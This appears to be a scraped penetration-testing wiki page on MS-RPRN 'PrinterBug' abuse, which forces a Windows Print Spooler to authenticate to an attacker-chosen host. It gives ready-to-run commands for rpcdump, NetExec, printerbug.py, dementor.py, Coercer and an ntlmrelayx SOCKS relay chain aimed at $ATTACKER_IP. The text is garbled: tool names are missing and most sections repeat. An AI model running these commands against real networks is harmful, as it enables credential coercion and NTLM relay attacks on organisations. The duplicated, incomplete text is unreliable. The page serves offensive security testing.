MS-RPRN abuse (PrinterBug)

Theory

Microsoft’s Print Spooler is a service handling the print jobs and other various tasks related to printing. An attacker controling a domain user/computer can, with a specific RPC call, trigger the spooler service of a target running it and make it authenticate to a target of the attacker's choosing. This flaw is a "won't fix" and enabled by default on all Windows environments ().

The coerced authentications are made over SMB. But MS-RPRN abuse can be combined with to elicit incoming authentications made over HTTP which heightens capabilities.

The "specific call" mentioned above is the RpcRemoteFindFirstPrinterChangeNotificationEx notification method, which is part of the MS-RPRN protocol. MS-RPRN is Microsoft’s Print System Remote Protocol. It defines the communication of print job processing and print system management between a print client and a print server.

The attacker needs a foothold on the domain (i.e. compromised account) for this attack to work since the coercion is operated through an RPC call in the SMB \pipe\spoolss named pipe through the IPC$ share.

Practice

Remotely checking if the spooler is available can be done with (Powershell) or with (Python).

The spooler service can be triggered with or (C#). There are many alternatives available publicly on the Internet.

rpcdump

We can check if the spooler service is available on a target using from impacket.

rpcdump.py $TARGET | grep -A 6 "spoolsv"

NetExec

(Python) can be used to check if the spooler service is running.

netexec smb <TARGET> -u <USER> -p <PASSWORD> -M spooler
netexec smb <TARGET> -u <USER> -p <PASSWORD> --local-auth -M spooler

SpoolerScanner

Check if the spooler service is available (Windows) using (Powershell)

.\SpoolerScan.ps1

PrinterBug

Using (python) we can trigger the spooler to authenticate against our cotrolled server.

printerbug.py 'DOMAIN'/'USER':'PASSWORD'@'TARGET' 'ATTACKER HOST'

Dementor

Using (python) we can trigger the spooler to authenticate against our cotrolled server.

python dementor.py -d $DOMAIN -u $USERNAME -p $PASSWORD $ATTACKER_IP $TARGET_IP

Coercer

Yet another alternative is to use the tool (python) as follow.

# Coerce
coercer coerce -u $USER -p $PASSWORD -d $DOMAIN --filter-protocol-name MS-RPRN -l $ATTACKER_IP -t $TARGET_IP

# Coerce a specific method
coercer coerce -u $USER -p $PASSWORD -d $DOMAIN --filter-method-name RpcRemoteFindFirstPrinterChangeNotificationEx -l $ATTACKER_IP -t $TARGET_IP

ntlmrelayx.py -t smb://$TARGET -socks
proxychains printerbug.py -no-pass 'DOMAIN'/'USER'@'TARGET' 'ATTACKER HOST'

Resources

Last updated 1 year ago

Was this helpful?

Theory

The coerced authentications are made over SMB. But MS-RPRN abuse can be combined with to elicit incoming authentications made over HTTP which heightens capabilities.

Practice

Remotely checking if the spooler is available can be done with (Powershell) or with (Python).

The spooler service can be triggered with or (C#). There are many alternatives available publicly on the Internet.

rpcdump

We can check if the spooler service is available on a target using from impacket.

rpcdump.py $TARGET | grep -A 6 "spoolsv"

NetExec

(Python) can be used to check if the spooler service is running.

netexec smb <TARGET> -u <USER> -p <PASSWORD> -M spooler
netexec smb <TARGET> -u <USER> -p <PASSWORD> --local-auth -M spooler

SpoolerScanner

Check if the spooler service is available (Windows) using (Powershell)

.\SpoolerScan.ps1

PrinterBug

Using (python) we can trigger the spooler to authenticate against our cotrolled server.

printerbug.py 'DOMAIN'/'USER':'PASSWORD'@'TARGET' 'ATTACKER HOST'

Dementor

Using (python) we can trigger the spooler to authenticate against our cotrolled server.

python dementor.py -d $DOMAIN -u $USERNAME -p $PASSWORD $ATTACKER_IP $TARGET_IP

Coercer

Yet another alternative is to use the tool (python) as follow.

# Coerce
coercer coerce -u $USER -p $PASSWORD -d $DOMAIN --filter-protocol-name MS-RPRN -l $ATTACKER_IP -t $TARGET_IP

# Coerce a specific method
coercer coerce -u $USER -p $PASSWORD -d $DOMAIN --filter-method-name RpcRemoteFindFirstPrinterChangeNotificationEx -l $ATTACKER_IP -t $TARGET_IP

In the situation where the tester doesn't have any credentials, it is still possible to and trigger the spooler service of a target via a SOCKS proxy.

ntlmrelayx.py -t smb://$TARGET -socks
proxychains printerbug.py -no-pass 'DOMAIN'/'USER'@'TARGET' 'ATTACKER HOST'

Nota bene: coerced NTLM authentications made over SMB restrict the possibilites of . For instance, an "unsigning cross-protocols relay attack" from SMB to LDAP will only be possible if the target is vulnerable to CVE-2019-1040 or CVE-2019-1166.